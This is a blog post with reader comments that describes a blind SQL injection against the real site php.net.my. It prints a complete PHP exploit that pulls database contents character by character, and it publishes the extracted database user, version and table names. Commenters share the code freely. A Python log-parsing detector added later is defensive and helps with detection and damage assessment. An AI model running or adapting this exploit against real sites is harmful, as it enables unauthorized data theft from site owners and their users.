at http://www.php.net.my/forum/thread.php/15/3854/1, one of the posters pointed to this blog, and his posting reads like this:
http://hackingexpose.blogspot.com/
Many of them get broken through with SQL. Come on, it's already 2009.
That got me curious, so the journey began.
The issue:
Website: Kumpulan Pengguna PHP Malaysia
URL: http://www.php.net.my
The database user() fingerprinting is as follows:

So I ended up writing a simple automated exploit for this, in PHP of course, as I am also a "Pengguna PHP in Malaysia" ;-). The exploit can fuzz the supplied parameter (for example table_name or column_name) and tests, character by character, which value returns a true statement. Here is the code:
<?php
function usage ()
{
    echo "\nBlind (my)SQL Injection Exploit/Fuzzer".
         "\nby 0x3a, hacking.expose@gmail.com\n".
         "\nspecially made for www.php.net.my ;-)".
         "\n\n";
    exit ();
}

// Build the boolean condition: is the character at position $pos of the
// selected expression equal to ASCII code $chr?
function query ($func, $chr, $pos)
{
    // custom ur query as u like
    $query = "15 AND ascii(substring((SELECT group_concat({$func}) from information_schema.tables where table_schema=database()),{$pos},1))={$chr}";
    //$query = "15 AND ascii(substring((SELECT group_concat({$func}) from information_schema.columns where table_name=0x63686174746572 limit 0,1),{$pos},1))={$chr}";
    //$query = "15 AND ascii(substring((user()),{$pos},1))={$chr}";
    //$query = "15 AND ascii(substring((database()),{$pos},1))={$chr}";
    //$query = "15 AND ascii(substring((@@version),{$pos},1))={$chr}";
    // URL-encode the characters a raw GET request line cannot carry
    $query = str_replace (" ", "%20", $query);
    $query = str_replace ("'", "%27", $query);
    return $query;
}

// Send one probe and report whether the page answered "true"
function exploit ($host, $path, $func, $pos, $chr)
{
    $chr = ord ($chr);
    $fp = fsockopen ($host, 80);
    if (!$fp)
        die ("\nCould not connect to {$host}\n");
    $query = query ($func, $chr, $pos);
    $request = "GET {$path}/replace/path/here/{$query} HTTP/1.1\r\n".
               "Host: {$host}\r\n".
               "Connection: Close\r\n\r\n";
    fputs ($fp, $request);
    $reply = "";
    while (!feof ($fp))
        $reply .= fgets ($fp, 1024);
    fclose ($fp);
    if (preg_match ("/replace your expected string here/", $reply))
        return true;
    else
        return false;
}

if ($argc != 4)
    usage ();
$host = $argv [1];
$path = $argv [2];
$func = $argv [3];
// candidate alphabet tried at every position, in this order
$key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,-_.";
$pos = 1;
$chr = 0;
echo "\nResult: ";
while ($pos <= 99999)
{
    if ($chr >= strlen ($key))   // no candidate matched: end of the string
        break;
    if (exploit ($host, $path, $func, $pos, $key [$chr]))
    {
        echo $key [$chr];
        $chr = 0;
        $pos++;
    }
    else
        $chr++;
}
echo "\n";
?>
From the automation I got the results below (fuzzing table_name, database, and version):

The final result:
USER: phpnetmy_main@localhost
DATABASE: phpnetmy
VERSION: 5.0.67-community
TABLES:
chat
chatter
event
event_participants
fm_file
forum_category
forum_file_attach
forum_forums
forum_posts
forum_smileys
forum_smileys_code
forum_temp_attach
forum_topics
hds
The problem is a common one: the script does not validate user-supplied input before using it in a SQL query. Removing the database error message without fixing the core issue is not a solution. php.net.my has been contacted and we are waiting for a reply.
Glossary:
Blind SQL injection is identical to normal SQL injection except that when an attacker attempts to exploit an application, rather than getting a useful error message they get a generic page specified by the developer instead. This makes exploiting a potential SQL injection more difficult but not impossible. An attacker can still steal data by asking a series of true and false questions through SQL statements.
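As an added defender's example (written for this page in Python; not code from the original post or from php.net.my), the following parses constructed access-log lines for the probe shape the script above sends, flags clients that burst such probes against one expression, and estimates from a completed sequence what the attacker learned.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post). The paths
# mimic the probe shape of the script above: one request per (position, char).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2009:10:00:01 +0800] "GET /forum/thread.php/15%20AND%20ascii(substring((database()),1,1))=97 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Mar/2009:10:00:02 +0800] "GET /forum/thread.php/15%20AND%20ascii(substring((database()),1,1))=98 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Mar/2009:10:00:03 +0800] "GET /forum/thread.php/15%20AND%20ascii(substring((database()),1,1))=112 HTTP/1.1" 200 7310
203.0.113.5 - - [10/Mar/2009:10:00:04 +0800] "GET /forum/thread.php/15%20AND%20ascii(substring((database()),2,1))=104 HTTP/1.1" 200 7310
198.51.100.7 - - [10/Mar/2009:10:00:05 +0800] "GET /forum/thread.php/15 HTTP/1.1" 200 7310
"""

# Common Log Format prefix: client ident user [time] "METHOD path HTTP/x"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Boolean probe shape used above: ascii(substring(<expr>,<pos>,1))=<code>
PROBE_RE = re.compile(r"ascii\(substring\((.*?),(\d+),1\)\)\s*=\s*(\d+)", re.I)

def parse_probes(log_text):
    """Return (client, expression, position, char_code) for every request
    whose URL-decoded path carries a char-by-char blind probe."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, path = m.group(1), unquote(m.group(2))  # decode %20 etc.
        p = PROBE_RE.search(path)
        if p:
            hits.append((client, p.group(1), int(p.group(2)), int(p.group(3))))
    return hits

def flag_clients(log_text, threshold=3):
    """Group probes by (client, expression); a burst of >= threshold probes
    against one expression is an extraction attempt, not a stray request."""
    groups = defaultdict(list)
    for client, expr, pos, code in parse_probes(log_text):
        groups[(client, expr)].append((pos, code))
    return {k: v for k, v in groups.items() if len(v) >= threshold}

def infer_exposed(probes):
    """Damage assessment: a sequential tool advances to the next position only
    after a TRUE answer, so the last code seen per position is the accepted
    one. The final position may still be an unfinished guess."""
    last = {}
    for pos, code in probes:
        last[pos] = code
    return "".join(chr(last[p]) for p in sorted(last))
```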
11 comments:
Whoa.. respect..
You left out < ? php on line 1.
I don't know why Blogspot isn't friendly with code..
Security feature, maybe.
Maybe so.
This fuzzer is great. Can I copy it? :D
Please do.. copy away.. then share and distribute.. don't forget to credit the author!
Won't forget.
Sharing is not a crime because Sharing is caring. B)
I'll treat you to roti telur at Ampangan! :P
hehehe
hahaha... you went and messed with php net too?
php net is a Malaysian website too.. as the ".my" tells the story.. they patched it as soon as we issued the bug report.. that's good..